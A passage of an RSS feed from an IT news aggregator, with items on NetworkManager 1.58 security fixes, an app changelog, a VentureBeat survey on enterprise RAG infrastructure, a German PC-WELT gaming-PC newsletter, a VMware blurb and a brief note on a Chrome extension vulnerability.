<p class="wp-block-paragraph">The release fixes vulnerabilities and tightens several defaults tied to DHCP handling and connection permissions.</p>



<ul class="wp-block-list">
<li><strong>CVE-2026-10805: </strong>Hostnames and MUD URLs are now validated before being written to the dhclient configuration file, rejecting characters that could alter the config syntax.</li>



<li><strong>DHCPv4 client fix: </strong>An out-of-bounds read in the internal DHCPv4 client, triggerable by an on-link attacker with a malformed UDP packet, has been fixed.</li>



<li><strong>Router option validation: </strong>The internal DHCPv4 client now ignores DHCP option 3, the Router option, when a lease also contains option 121, the Classless Static Route option, following the recommendation in RFC 3442.</li>



<li><strong>Permission checks and deprecations:</strong> For private connections that restrict access to specific users, NetworkManager now verifies that the user can access the referenced 802.1X certificates and keys.</li>
</ul>



<h2 class="wp-block-heading">Tunneling and automation updates</h2>



<p class="wp-block-paragraph">Two smaller but practical additions round out this release: a new tunnel type for virtualized networks, and a fix that closes a gap in how NetworkManager’s state survives a reboot.</p>



<p class="wp-block-paragraph">NetworkManager 1.58 also adds support for creating and managing GENEVE tunnel interfaces. GENEVE, short for Generic Network Virtualization Encapsulation, is a tunneling protocol that wraps Ethernet frames inside UDP packets, letting virtualized or overlay networks run on top of physical Layer 3 infrastructure. It shows up mainly in virtualization and cloud environments, where a hypervisor or container networking layer needs to build a virtual network segment across physical hosts. Previously, NetworkManager could not create or manage these interfaces directly.</p>



<p class="wp-block-paragraph">The release also adds persisted managed state. NetworkManager tracks whether it is responsible for a given network device, a setting called its managed state. Until now, that setting reset on every reboot, so provisioning tools had to reapply it each time a system restarted. NetworkManager 1.58 lets the managed state survive a reboot when it is set through nmcli or the D-Bus API.</p>



<p class="wp-block-paragraph">“It’s a small change but closes a real automation gap: Provisioning tools and cloud-init style workflows can set a device’s state once via D-Bus or nmcli and trust it survives a reboot, instead of reapplying config every time,” Van Hoof said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v 7.0.5]]></title>
<description><![CDATA[Improve slideshow preload / animation / swipes in rich messages.
Fix stories leaving empty space on chats list top.
Fix custom emoji frame size in favorite reactions.
Crash fixes.]]></description>
<link>https://tsecurity.de/de/3689881/downloads/v-705/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689881/downloads/v-705/</guid>
<pubDate>Thu, 23 Jul 2026 19:46:56 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Improve slideshow preload / animation / swipes in rich messages.</li>
<li>Fix stories leaving empty space on chats list top.</li>
<li>Fix custom emoji frame size in favorite reactions.</li>
<li>Crash fixes.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI context gap: Enterprise AI organizations have a trust problem, not a retrieval problem — and most are still building the fix]]></title>
<description><![CDATA[Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define...]]></description>
<link>https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define the category — yet a majority of enterprises have already watched their agents produce confident, wrong answers traced to missing or inconsistent context. A governed semantic layer is emerging as the fix, but most are still building it; the field is converging on hybrid retrieval; and even as provider-native tools lead in practice, a plurality say they intend to keep best-of-breed. The result is a context gap — agents that sound authoritative running on a foundation their owners do not yet fully trust.</p><p>This wave of VentureBeat Pulse Research examines the enterprise RAG and context layer: what feeds AI agents their business context, which retrieval systems enterprises run, how they buy and measure them, where the architecture is heading, and — most revealingly — how often that context is already failing them.</p><p>The central finding is a context gap — the distance between how confidently enterprise agents answer and how reliable the context beneath them actually is. A majority of enterprises (57%) report that in the past six months their AI agents produced confident but wrong answers they traced to missing or inconsistent business context, and more than half of those said it happened more than once. This is not a fringe failure: retrieval is the primary context source for 38% of enterprises, more than any other approach, so when retrieval is thin or inconsistent, the errors it produces are wearing the agent’s authority. The infrastructure to fix it is being built — 58% already run or are building a governed semantic layer — but for most it is not yet in production.</p><p>Underneath, the market is consolidating in a direction that surprises. Provider-native retrieval — OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) — already leads every dedicated vector database, and enterprises expect hybrid retrieval to dominate by the end of 2026 (34%). Yet a plurality (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack, and a majority (57%) plan to switch or add a provider within the year. Stated preference and actual usage are pulling in opposite directions — the market is buying provider-native while insisting it wants independence.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series. This survey focused on enterprise RAG infrastructure and the context layer — the retrieval systems, semantic layers, and context sources that feed AI agents. Responses are filtered to organizations with more than 100 employees (n=101); the survey drew no responses from organizations of 100 or fewer, so the full sample qualifies. All responses are from a single Q2 2026 (June) wave, so the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 251–1,000 employees (31%) and 101–250 (31%) lead, with 1,001–5,000 (20%), 5,001–10,000 (12%), and 10,001+ (7%) above them. By role it spans managers (39%), individual contributors (27%), the C-suite (16%), and VPs and directors (14%); on purchasing authority it is buyer-credible, with 46% final decision-makers and another 26% recommenders or influencers. Technology/Software is the largest industry at 20%, followed by Healthcare/Life Sciences (11%) and a broad spread across retail, transportation, financial services, manufacturing, and education.</p><p>At 101 respondents this is a modest sample and should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It is best read as the view from organizations actively standing up RAG and context infrastructure rather than from the largest operators.</p><h2>Finding 1: Confident and wrong</h2><p><b>More than half have traced agent errors to bad context</b></p><p>We asked whether, in the past six months, enterprises had traced a confident but wrong agent answer to missing or inconsistent business context. Most had.</p><div></div><p>This is the report’s defining number. A majority of enterprises (57%) have already had an AI agent produce a confident, wrong answer they traced to bad context — wrong metrics, stale definitions, or missing documents — and more than half of those have seen it happen more than once. Only 28% report no such failure, and a small remainder either don’t run agents on enterprise data or don’t trace root cause closely enough to know. </p><p>The failure mode is specific and dangerous: the model is not obviously hallucinating; it is confidently wrong because the context feeding it was thin or inconsistent. Everything else in this report — what enterprises retrieve, how they govern it, and what they plan to build — is downstream of this problem.</p><h2>Finding 2: RAG is the default context source</h2><p><b>Retrieval feeds more agents than any other method</b></p><p>We asked what an enterprise’s AI agents primarily use to understand its data. Retrieval leads by a wide margin.</p><div></div><p>Retrieval is the backbone of enterprise context. For 38% of organizations, RAG over documents or a vector index is the primary way agents understand the business — nearly twice the share of the next approach, a governed semantic layer or ontology (21%). Mixed approaches (14%), direct live-system queries (10%), and long-context loading (6%) fill out the rest, and only 2% let agents run on the model’s general knowledge alone. The concentration matters in light of Finding 1: because so much enterprise context flows through retrieval, the quality of that retrieval is the quality of the answer. When RAG is the default source, thin retrieval is not an edge case — it is the main failure surface.</p><p>One approach is notable for its absence from these answers: customizing model weights, also known as fine-tuning. Every leading source of business context is injected at run time. Our most recent direct measurement of fine-tuning comes from our April–May survey wave (a separate survey, n=136), where fine-tuning capabilities ranked last of six factors in model selection at 5% — even as 26% of that sample still named fine-tuning and customization an investment they expect to grow. Fine-tuning has fallen out of the primary selection conversation; context injection is how enterprises make agents knowledgeable about their business.</p><h2>Finding 3: Provider-native retrieval already leads the vector databases</h2><p><b>OpenAI file search and vertex AI search top the dedicated tools</b></p><p>We asked which retrieval systems enterprises run in production today. The answer favors the model providers and hyperscalers over the specialists.</p><div></div><p>The dedicated vector database is no longer the center of the RAG stack. OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) lead — provider-native and hyperscaler-native retrieval — ahead of every purpose-built vector database. Among the specialists, the most-used is the one enterprises already run for other reasons (Elasticsearch/OpenSearch, 20%) and the open, embedded option (pgvector, 12%); the pure-play vector databases that define the category — Weaviate, Qdrant, Pinecone, Milvus — each sit in single digits to low double digits. Notably, 13% of enterprises say they still run no production RAG at all. As with the platforms in the parallel infrastructure wave, enterprises are gravitating to retrieval that comes bundled with tools they already buy.</p><p>The shape of this finding held across both Q2 waves. In April–May (n=161), provider-built retrieval led usage there too, while every dedicated vector database remained marginal — the most-used standalone vector database peaked at 8% of that sample — and the hybrid, pluralistic future was already the consensus expectation (34% expected hybrid retrieval to dominate, with another 29% expecting multiple architectures by use case). Two waves, consistent picture: the category that coined the “vector database” term is being collected by the platforms enterprises already buy from.</p><h2>Finding 4: But they say they want to keep best-of-breed</h2><p><b>A plurality resist consolidating onto a provider’s native stack</b></p><p>We asked how enterprises will respond as model providers bundle retrieval, memory, and orchestration into their platforms. Their stated intent cuts against their current usage.</p><div></div><p>Here is the tension at the heart of the stack. Even as provider-native retrieval leads in practice (Finding 3), a plurality of enterprises (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack — well ahead of the 21% who plan to consolidate. Another 21% expect a mix, and 9% intend to build and own the layer themselves. The gap between what enterprises run and what they say they want is the strategic question of the category: they are adopting bundled retrieval for convenience while asserting they will preserve independence. Which impulse wins — the pull of the provider bundle or the stated preference for modular control — will shape the retrieval market more than any single tool.</p><h2>Finding 5: Hybrid retrieval is the consensus bet</h2><p><b>Vector-only retrieval is already seen as insufficient</b></p><p>We asked which retrieval architecture enterprises expect to dominate their production RAG systems by the end of 2026. The field is converging — with a large share still unsure.</p><div></div><p>The architecture is settling on hybrid. A third (34%) expect hybrid retrieval — embeddings combined with reranking and access controls — to dominate their production systems by the end of 2026, three times the 11% who expect vector-only retrieval to prevail. That is a notable signal: the pure vector-search approach that launched the category is already viewed as insufficient on its own, superseded by pipelines that add reranking for accuracy and access controls for governance — the very access controls whose absence produces the failures in Finding 1. Tellingly, the second-largest answer is uncertainty: 17% simply don’t know, and another 14% expect to move beyond a dedicated vector layer entirely toward tool-first or long-context retrieval. The consensus is not a single tool but a layered pipeline — and it is not yet fully formed.</p><h2>Finding 6: The governed context layer is being built now</h2><p><b>Most run or are building a semantic layer — few in production</b></p><p>We asked whether enterprises use a governed semantic or context layer to give agents and BI a shared understanding of their data. Most are on the path; fewer have arrived.</p><div></div><p>The fix for the context gap is under construction. Well over half of enterprises (58%) either run a governed semantic layer in production (25%) or are piloting and building one (34%), and a further 17% are actively evaluating — meaning three-quarters are engaged with the idea in some form. But the balance is telling: more are building than have shipped, so for most enterprises the shared, governed definition layer that would prevent the "confident but wrong" failures of Finding 1 is still a work in progress. The semantic layer is the industry’s answer to inconsistent context; this wave catches it mid-construction, ambition well ahead of production.</p><h2>Finding 7: Bought on ingestion and simplicity, watched for correctness</h2><p><b>Selection favors operability; monitoring favors correctness and security</b></p><p>We asked what matters most when enterprises choose a retrieval system, and what they track once it is running. Both answers lean practical.</p><div></div><p>Enterprises choose retrieval systems on operability. Ease of data ingestion (36%), latency and performance (32%), and operational simplicity (29%) lead the selection criteria — ahead of retrieval accuracy and access control (23% each), the two factors most directly tied to the failures in Finding 1. Once systems are running, the emphasis shifts toward trust: the most-tracked metrics are response correctness (42%) and security and access control (38%), ahead of latency (28%), operational stability (27%), and answer relevance (23%). </p><p>Satisfaction with current systems is moderately positive but not enthusiastic — on a five-point scale, overall satisfaction averages 4.0, with ease of implementation and value for money both near 3.9. Enterprises buy for how easily a system runs and watch it for whether it can be trusted.</p><h2>Finding 8: A retrieval reshuffle is coming</h2><p><b>A majority plan to change providers — and the vector specialists are gaining interest</b></p><p>We asked whether enterprises plan to change or add a retrieval provider, and which they are considering. The consideration set differs from today’s stack.</p><div></div><p>The retrieval stack is not settled. While 43% have no plans to change, a small majority (57%) intend to switch or add a provider within twelve months, and a quarter (26%) within the next quarter. The consideration set is where it gets interesting: provider-native retrieval still leads what enterprises are evaluating (OpenAI 22%, Vertex AI Search 21%), but the open-source vector specialists punch above their current footprint — Qdrant (14%) and Milvus (13%) draw more switching interest than their present usage (10% and 6%) would suggest. Read with Finding 4, the picture is a market in flux: enterprises run provider-native today, are evaluating a broader field, and say they want to keep their options open. The reshuffle ahead will test whether best-of-breed intent survives contact with the convenience of the bundle.</p><h1>The bottom line: A context gap that more retrieval alone won’t close</h1><p>Organizations with more than 100 employees are wiring agents into their business faster than they can guarantee the context those agents run on. Retrieval is the default source of enterprise context, and it increasingly comes from the model providers and hyperscalers rather than the dedicated vector databases — yet a majority of enterprises have already watched agents answer confidently and wrongly because that context was thin or inconsistent. The failure is not exotic; it is the predictable result of pointing authoritative-sounding agents at an unreliable foundation.</p><p>The industry’s answer — a governed semantic layer, hybrid retrieval with reranking and access controls — is being built but is mostly not yet in production, and enterprises are pulled between the convenience of provider-native bundles and a stated preference for best-of-breed independence. At 101 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market — but the direction is clear: the context layer is the next contested tier of the AI stack, and right now agents are running ahead of it. The context gap is not a retrieval-volume problem that more documents or bigger indexes will solve on their own; it is a problem of governed, consistent, access-aware context. The open question for later waves is whether enterprises finish building that layer before the confident-but-wrong failures move from the lab into decisions that matter.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. At this sample size the results should be read as a directional signal rather than a precise measurement — it's a self-selected sample, not a probability sample, and skews toward the mid-market. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with strong purchasing authority, across technology, healthcare, retail, transportation, financial services, manufacturing, and education.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei RTX 5090 für die HMX 6 und Zeitreise zur Höllenmaschine 4 mit vier GPUs]]></title>
<description><![CDATA[Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier G...]]></description>
<link>https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</guid>
<pubDate>Thu, 23 Jul 2026 17:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier Grafikprozessoren neue Maßstäbe beim Gaming setzte. Wenn ihr keine Ausgabe verpassen wollt, könnt ihr den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">Newsletter kostenlos abonnieren</a> – aber vergesst nicht, die Anmeldung via E-Mail zu bestätigen. Viel Spaß beim Lesen!</p>



<p>Hier geht es direkt <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">zum Gewinnspiel der HMX 6 im Gesamtwert von 40.000 Euro</a>. </p>



<h2 class="wp-block-heading toc">HMX 6: 2x RTX 5090 von ZOTAC GAMING und Halo-Design</h2>



<p>Jetzt können wir endlich verraten, welche Grafikkarten in der HMX 6 stecken: Als primäre Gaming-Grafikkarte der HMX 6 ist die RTX 5090 AMP Extreme INFINITY gedacht, während wir parallel dazu die RTX 5090 ARCTICSTORM AIO für <a href="https://store.steampowered.com/app/993090/Lossless_Scaling/" target="_blank" rel="noreferrer noopener">verlustfreie Skalierung</a> verwenden, um Bildqualität und -wiederholrate in praktisch jedem Videospiel zu verbessern. Natürlich könnt ihr die gebündelte Kraft der zwei 5090 auch im kreativen Einsatz nutzen, etwa beim 3D-Rendering oder KI-Berechnungen. Hier findet ihr alle Informationen zu den <a href="https://www.pcwelt.de/article/3193773/hoellenmaschine-hmx-6-mit-zwei-rtx-5090-von-zotac-gaming.html" target="_blank" rel="noreferrer noopener">zwei ZOTAC-Grafikkarten</a>. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c25ef"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ZOTAC-600.jpg?quality=50&amp;strip=all" alt="ZOTAC 600" class="wp-image-3196875" width="600" height="577" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ZOTAC</p></div>



<p>Eigentlich wollten Kris und ich euch diese Woche schon den aktuellen Stand des Casecon im <a href="https://www.pcwelt.de/article/3194747/hoellenmaschine-hmx-6-im-halo-campaign-evolved-design.html" target="_blank" rel="noreferrer noopener">Halo-Design</a> zeigen. Doch unserem Modder <a href="https://dcmm.de/media/uploads/2023/04/SIEGER_POKAL_012.jpg" target="_blank" rel="noreferrer noopener">Stefan Ulrich</a> fehlen noch diverse Materialien. Jetzt fahren wir wahrscheinlich nächste Woche, doch die Zeit drängt schon wieder, denn wir wollen ja auf die Gamescom mit der HMX 6.</p>



<h2 class="wp-block-heading toc">Rückblick: Die Höllenmaschine 4 setzte technische und optische Maßstäbe</h2>



<p>Neue Maßstäbe setzten wir 2012 auch bei der Vermarktung der Höllenmaschine 4 – zumindest für unsere Verhältnisse: vier aufwendig produzierte <a href="https://www.youtube.com/watch?v=uY7XIARRvZw&amp;t=1s">Teaser-Videos</a> mit Engelchen und Teufelsdamen sowie Fritz als Padawan von Obi-Wan Michi. Das hat riesigen Spaß gemacht und uns als Team Hölle zusammengeschweißt – und war der Beginn einer wunderbaren Freundschaft. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c2e99"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HM4-600.jpg?quality=50&amp;strip=all" alt="HM4 600" class="wp-image-3196869" width="600" height="563" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<p>Technisch auf der Höhe der Zeit waren wir mit den beiden Grafikkarten ASUS GTX690-4GD5, die jeweils zwei 915 MHz schnelle Nvidia Geforce GTX 690 beherbergten. Vier Grafikprozessoren gleichzeitig waren damals absoluter Wahnsinn und sorgten regelmäßig für offene Münder. Dazu gab es den Sechskerner Intel Core i7-3960X, 64 GB RAM im Vierkanalmodus, mit der OCZ RevoDrive die erste PCIe-SSD in einer Höllenmaschine und mit 10 Terabyte natürlich auch wieder verrückt viel HDD-Speicherplatz.</p>



<p>Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern <a href="https://www.babetech.de/index.php/ueber-uns">Martin und Stefan Blass</a>. Sie haben ins Cooler Master Cosmos II ein Sichtfenster gefräst und per Airbrush lodernde Flammen auf die beiden Flügeltüren gezaubert. ARGB war damals noch kein Thema, aber mit dem Multidimmer von Richter waren immerhin individuelle Farbtöne und -wechsel per IR-Fernbedienung möglich. Hier geht es zum liebevoll restaurierten <a href="https://www.pcwelt.de/article/3188806/vor-14-jahren-pc-welt-verlost-hoellenmaschine-4-fuer-13333-euro.html" target="_blank" rel="noreferrer noopener">Artikel zur Höllenmaschine 4 aus 2012</a>.</p>



<h2 class="wp-block-heading toc">Maus mit Noctua-Lüfter und Steam Machine im Praxis-Test </h2>



<p>Diese Woche ist eine skurrile Mail in meinem Postfach gelandet: Pulsar und Noctua präsentieren stolz die Früchte ihrer Zusammenarbeit: die <a href="https://www.noctua.at/en/news/pulsar-and-noctua-release-feinmann-f01-noctua-edition-gaming-mouse">Feinmann F01 Noctua Edition</a>, eine Gaming-Maus mit aktiver Belüftung der Handflächen. Ich bin gespannt, wer sich über kühlere Handflächen beim Zocken freut.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c38f4"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Feinmann-F01-Noctua-Edition.jpg?quality=50&amp;strip=all" alt="Feinmann F01 Noctua Edition" class="wp-image-3196763" width="600" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Noctua/Pulsar</p></div>



<p>Mein Kollege und Namensvetter Michael Crider hat sich die kostspielige (<a href="https://www.pcwelt.de/article/3172820/steam-machine-valves-konsole-kostet-ab-1039-euro.html">ab 1.039 Euro</a>) Steam Machine gekauft und einem <a href="https://www.pcwelt.de/article/3194800/steam-machine-im-praxistest-ganz-nett-aber-leider-enttaeuschend.html" target="_blank" rel="noreferrer noopener">ausführlichen Praxistest</a> unterzogen. Sein Fazit fällt allerdings ernüchternd aus: Ein günstiger Mini-PC mit selbst installiertem SteamOS bietet derzeit nahezu denselben Nutzen für deutlich weniger Geld.</p>



<p>Warum es ein Problem ist, dass <a href="https://www.pcwelt.de/article/3193615/in-neuen-laptops-kommen-alte-cpus-zum-einsatz-das-ist-ein-problem.html" target="_blank" rel="noreferrer noopener">in neuen Laptops alte CPUs zum Einsatz kommen</a>, erklärt mein Kollege Mark Hachman.  </p>



<h2 class="wp-block-heading toc">Vielen Dank fürs Lesen!</h2>



<p>ommende Woche besuchen Kris und ich endlich unseren Modder Stefan, der uns dann hoffentlich schon das fast fertige Tisch-PC-Gehäuse für die Build-Week präsentiert – immer optimistisch bleiben, denn langsam drängt die Zeit. Außerdem reisen wir zurück ins Jahr 2013 zur legendären Höllenmaschine 5 mit den vielen Totenköpfen. Wenn ihr nichts verpassen wollt, abonniert den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">kostenlosen HMX-6-Newsletter</a> – und denkt daran, eure Anmeldung per E-Mail zu bestätigen. Ich freue mich schon auf nächste Woche – bis dann! Euer Michi.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[VCF Breakroom Chats | Episode 91 Spotting Infra Issues Instantly with VCF 9.1 ]]></title>
<description><![CDATA[Watch the latest episode of VCF Breakroom Chats. In Episode 91, Kyle Gleed and Sehjung Hah discuss how real-time metrics in VMware Cloud Foundation (VCF) 9.1 transforms VMware infrastructure into a true private cloud. Building on operational improvements and enhanced visibility into metrics and c...]]></description>
<link>https://tsecurity.de/de/3689467/downloads/vcf-breakroom-chats-episode-91-spotting-infra-issues-instantly-with-vcf-91/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689467/downloads/vcf-breakroom-chats-episode-91-spotting-infra-issues-instantly-with-vcf-91/</guid>
<pubDate>Thu, 23 Jul 2026 17:17:43 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="169" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png 1920w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=300,169 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=768,432 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=1024,577 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=1536,865 1536w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=752,423 752w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=576,324 576w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2025/12/VCF-Breakroom-Chats-Final-Selected-featured-image.png?resize=600,338 600w" sizes="(max-width: 300px) 100vw, 300px"></div>
<p>Watch the latest episode of VCF Breakroom Chats. In Episode 91, Kyle Gleed and Sehjung Hah discuss how real-time metrics in VMware Cloud Foundation (VCF) 9.1 transforms VMware infrastructure into a true private cloud. Building on operational improvements and enhanced visibility into metrics and costs, VCF 9.1 enables teams to do the following.   Learn more … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/vcf-breakroom-chats-episode-91-spotting-infra-issues-instantly-with-vcf-9-1/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/vcf-breakroom-chats-episode-91-spotting-infra-issues-instantly-with-vcf-9-1/">VCF Breakroom Chats | Episode 91 Spotting Infra Issues Instantly with VCF 9.1 </a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A malicious Chrome extension for Adobe Acrobat could let hackers access private WhatsApp chats]]></title>
<description><![CDATA[Researchers find a universal cross-site scripting-class cross-origin data disclosure vulnerability in a popular Chrome extension.]]></description>
<link>https://tsecurity.de/de/3689170/it-nachrichten/a-malicious-chrome-extension-for-adobe-acrobat-could-let-hackers-access-private-whatsapp-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689170/it-nachrichten/a-malicious-chrome-extension-for-adobe-acrobat-could-let-hackers-access-private-whatsapp-chats/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researchers find a universal cross-site scripting-class cross-origin data disclosure vulnerability in a popular Chrome extension.]]></content:encoded>
</item>
<item>
